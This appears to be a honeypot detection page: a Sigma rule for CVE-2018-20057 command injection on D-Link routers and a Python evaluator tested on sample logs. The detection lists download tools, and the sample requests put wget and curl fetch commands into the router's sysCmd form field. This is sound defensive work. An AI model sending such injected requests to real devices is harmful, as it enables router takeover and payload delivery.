CVE-2018-20057
Detection of CVE-2018-20057 observed from our Honeypots
Sigma rule
```yaml
title: CVE-2018-20057
status: experimental
description: Detection of CVE-2018-20057 observed from our Honeypots
references:
  - https://nvd.nist.gov/vuln/detail/CVE-2018-20057
  - https://www.exploit-db.com/exploits/47031
author: Loginsoft Research Unit
date: 2021/09/01
logsource:
  product: D-Link DIR-619L Rev.B 2.06B1 and DIR-605L Rev.B 2.12B1
  category: Router
detection:
  # Field match: POST to the command form handler carrying a sysCmd parameter
  selection:
    c-uri: "/goform/formSysCmd"
    cs-method: "POST"
    # "contains" so the marker matches when a command value follows it
    c-uri-query|contains: "sysCmd="
  # Trailing form fields of the syscmd.asp submission
  keywords1:
    - "&apply=Apply&submit-url=/syscmd.asp&msg="
  # Download tool names (matched anywhere in the event)
  keywords2:
    - "wget"
    - "curl"
  condition: selection and keywords1 and keywords2
level: high
```
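The rule's condition evaluated over constructed log events, as an added example (not part of the original rule or Loginsoft's code). The event shape, the `raw` field and the sample requests are assumptions; matching is case-insensitive as in Sigma, and percent-decoding is applied first so URL-encoded logs still satisfy `keywords1`.

```python
from urllib.parse import unquote_plus

# Values copied from the rule above.
SELECTION = {"c-uri": "/goform/formSysCmd", "cs-method": "POST"}
QUERY_MARKER = "sysCmd="
KEYWORDS1 = ["&apply=Apply&submit-url=/syscmd.asp&msg="]
KEYWORDS2 = ["wget", "curl"]


def rule_matches(event):
    """Evaluate `selection and keywords1 and keywords2` for one event dict."""
    for field, expected in SELECTION.items():
        if event.get(field, "").lower() != expected.lower():
            return False
    # Decode percent-encoding first, so "%2Fsyscmd.asp" equals "/syscmd.asp".
    query = unquote_plus(event.get("c-uri-query", "")).lower()
    raw = unquote_plus(event.get("raw", "")).lower()
    if QUERY_MARKER.lower() not in query:
        return False
    has_kw1 = any(k.lower() in raw for k in KEYWORDS1)
    has_kw2 = any(k.lower() in raw for k in KEYWORDS2)
    return has_kw1 and has_kw2


def make_event(event_id, method, uri, params):
    # Hypothetical event shape: parsed fields plus the raw logged request.
    return {"id": event_id, "cs-method": method, "c-uri": uri,
            "c-uri-query": params, "raw": f"{method} {uri} {params}"}


TAIL = "&apply=Apply&submit-url=%2Fsyscmd.asp&msg="
# Constructed sample events (192.0.2.0/24 is a documentation range).
EVENTS = [
    make_event("evt-1", "POST", "/goform/formSysCmd",
               "sysCmd=wget+http%3A%2F%2F192.0.2.10%2Fsample" + TAIL),
    make_event("evt-2", "POST", "/goform/formSysCmd",
               "sysCmd=ping+-c+1+192.0.2.1" + TAIL),
    make_event("evt-3", "GET", "/goform/formSysCmd",
               "sysCmd=curl+http%3A%2F%2F192.0.2.10%2Fsample" + TAIL),
    make_event("evt-4", "POST", "/index.asp", "q=curl"),
]


def matching_ids(events=EVENTS):
    return [e["id"] for e in events if rule_matches(e)]


if __name__ == "__main__":
    print(matching_ids())
```

Only the first event fires: the second lacks a download tool name, the third uses GET, and the fourth targets a different URI.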